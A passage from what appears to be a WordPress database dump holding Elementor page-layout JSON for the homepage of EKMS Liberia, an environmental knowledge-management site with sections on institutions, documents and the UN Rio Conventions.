:50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13201,2139,'_elementor_version','2.7.5'),(13202,2139,'_elementor_template_type','wp-page'),(13203,2139,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13206,2140,'_wp_page_template','default'),(13207,2140,'_elementor_edit_mode','builder'),(13208,2140,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(0,0,0,0.15)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"left\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"left\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and 